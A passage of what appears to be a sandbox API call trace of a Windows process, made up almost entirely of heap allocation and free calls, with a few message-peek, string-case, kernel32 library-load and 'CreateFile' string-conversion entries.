hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0187.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0187.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0187.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0187.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0187.111] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0187.111] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0187.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0187.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0187.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0187.113] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0187.113] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.113] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0187.113] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0187.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0187.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0187.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0187.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0187.113] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0187.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0187.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0187.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0187.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0187.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0187.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0187.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0187.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0187.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0187.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0187.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0187.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.116] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.119] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0187.119] RtlAllocateHeap 